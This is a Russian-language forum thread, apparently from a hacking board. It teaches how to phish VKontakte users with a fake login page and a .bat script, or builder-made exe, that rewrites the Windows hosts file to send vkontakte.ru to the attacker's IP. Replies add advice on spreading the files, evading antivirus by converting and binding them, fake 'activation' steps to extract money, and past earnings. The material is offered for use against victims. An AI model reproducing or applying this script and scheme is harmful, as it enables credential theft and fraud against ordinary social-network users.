Вы хотите создать фейк и незнаете как? Вот вам в помощь. Для начала нам естественно потребуется тот самый фейк. скачать его можно ТУТ Не забудьте только отредактировать его под себя. Качаем и заливаем его на хост. !Обязательно должен быть хостинг с выделенный ip! К сожалению бесплатных я таких не нашёл. Далее идём сюда http://2ip.ru/lookup/ и определяем ip адрес нашего сайта. Теперь, надо сделать так, чтобы человек, заходя на сайт vkontakte.ru видел наш фейк. Для этого создаём текстовый файл и пишем туда следующее: Code: @echo off echo -- >> %windir%\system32\drivers\etc\hosts echo сюда_ip_адрес_сайта www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo сюда_ip_адрес_сайта vkontakte.ru >> %windir%\system32\drivers\etc\hosts Например: Code: @echo off echo -- >> %windir%\system32\drivers\etc\hosts echo 66.40.52.65 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts echo 66.40.52.65 vkontakte.ru >> %windir%\system32\drivers\etc\hosts сохраняем с расширением .bat Так же можно использовать для этого builder. CКАЧАТЬ ЗДЕСЬ Вбиваем в него ip адрес сайта и жмём build. Создаться файл с расширением exe Всё, теперь любой юзер запустив файл, либо наш bat-ник либо exe-шник, изменит инфу, находящуюся здесь C:\WINDOWS\system32\drivers\etc в файле hosts. И при вводе адреса vkontakte.ru будет попадать на наш фейк. Осталось только повпаривать всем эти файлы) Всем спасибо за внимание и Удачи. Хоть бы кто-то отблагодарил.... +
Оо...кто проверит на вирусы файл? Парень по ходу решил нае*ать тут всех! Зачем exe файл на хост лить?
Статья баян. тема уже отжила своё. полгода назад можно было по 3-4тыс$ за сутки вытаскивать. через контакт. а щас тема уже умерла. из за того что её в паблик выкинули)
Тема не умерла и на ней еще много кто ведется... Кто нибудь знает дешевый какой нибудь хостинг с выделенный ip?
вчера повёлся на это, закачал бат файл(типо прога для взлома вконтакте по айди=)), благо кое что знаю про фэйки, не стал отправлять смс, вводить пасс! погуглил, инфы очень много, так что считаю тему не актуальной, хотя и интерсной! автару +
Бред. АНТИВИРИ ОРУТ ЭТО РАЗ Фейк надо покупать, чтоб вылетала активация после того как жертва логинется, это два BAT TO EXE converter + склейка с любым файлом. Акки для спама, чтоб окупить всё. СТАТЬЯ "HELLO WORD!" Хотя для новичков сгодиться
мля я сделал как написано, терь после тестирования, вместо контакта выходит другой сайт. ппц. А хостс тот же, все норм